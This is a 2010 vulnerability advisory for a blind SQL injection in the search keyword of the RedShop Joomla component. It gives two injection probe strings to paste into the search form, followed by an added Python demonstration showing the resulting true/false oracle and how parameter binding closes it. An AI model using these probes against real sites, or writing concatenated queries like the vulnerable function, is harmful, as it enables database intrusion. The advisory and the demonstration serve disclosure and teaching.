RedShop 1.0.23.1 Joomla Component Blind SQL Injection Vulnerability
Name              RedShop
Vendor            http://redweb.dk
Versions Affected 1.0.23.1
Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com
Date              2010-07-13
X. INDEX
I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX
I. ABOUT THE APPLICATION
________________________
RedShop is a popular and commercial Joomla component.
It is a Content Creation Kit style of webshop / webshop
tool that gives users the most access ever offered to
completely style and change their webshop, without much
more knowledge than HTML and a bit of CSS.
II. DESCRIPTION
_______________
A parameter in the search form is not properly sanitised
before being used in a SQL query.
III. ANALYSIS
_____________
Summary:
A) Blind SQL Injection
A) Blind SQL Injection
______________________
The parameters viewform and id are not properly sanitised.
The parameter keyword is not properly sanitised before
being used in a SQL query. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation requires that "magic_quotes_gpc"
is disabled.
IV. SAMPLE CODE
_______________
A) Blind SQL Injection
Copy and paste the following lines into the search form:
' AND (SELECT(IF(ASCII(0x41) = 64,false,NULL))) OR '
' AND (SELECT(IF(ASCII(0x41) = 65,true,NULL))) OR '
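Added example (not code from the advisory or from RedShop) showing why the two lines above act as a yes/no oracle when the keyword is concatenated into the query, and why binding it as a parameter removes the oracle. It runs against an in-memory SQLite table with small shims for MySQL's IF() and ASCII(); the table name, column name and product rows are constructed assumptions, not RedShop's schema.

```python
import sqlite3

# Constructed sample catalogue; table/column names are assumptions,
# not RedShop's real schema.
PRODUCTS = ["Red Hat", "Blue Scarf", "Green Gloves"]

# The two probes from section IV, exactly as the advisory gives them.
PROBE_FALSE = "' AND (SELECT(IF(ASCII(0x41) = 64,false,NULL))) OR '"
PROBE_TRUE = "' AND (SELECT(IF(ASCII(0x41) = 65,true,NULL))) OR '"


def _connect():
    conn = sqlite3.connect(":memory:")
    # SQLite has no IF() or ASCII(); register shims so the probes evaluate
    # as they would on MySQL (0x41 is the string 'A' there, ASCII 65).
    conn.create_function("IF", 3, lambda cond, a, b: a if cond else b)
    conn.create_function("ASCII", 1,
                         lambda v: v if isinstance(v, int) else ord(str(v)[0]))
    conn.execute("CREATE TABLE product (name TEXT)")
    conn.executemany("INSERT INTO product VALUES (?)", [(n,) for n in PRODUCTS])
    return conn


def search_vulnerable(keyword):
    """Keyword concatenated into the statement: the quote in the probe closes
    the literal and the remainder runs as SQL (the pattern the advisory reports).
    The true probe returns every row, the false probe returns none."""
    sql = "SELECT name FROM product WHERE name LIKE '%" + keyword + "%'"
    return [row[0] for row in _connect().execute(sql)]


def search_fixed(keyword):
    """Keyword bound as a parameter: the whole probe is matched as plain text,
    so both probes return the same (empty) result."""
    sql = "SELECT name FROM product WHERE name LIKE ?"
    return [row[0] for row in _connect().execute(sql, ("%" + keyword + "%",))]


def oracle_distinguishable(search):
    """True when the two probes produce different result sets, i.e. the
    application leaks one boolean per request."""
    return search(PROBE_TRUE) != search(PROBE_FALSE)


if __name__ == "__main__":
    print("concatenated query leaks:", oracle_distinguishable(search_vulnerable))
    print("parameterised query leaks:", oracle_distinguishable(search_fixed))
```

Note that escaping quotes (what magic_quotes_gpc does) only breaks this particular probe; binding the value as a parameter is what makes the keyword inert regardless of its content.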
V. FIX
______
No fix.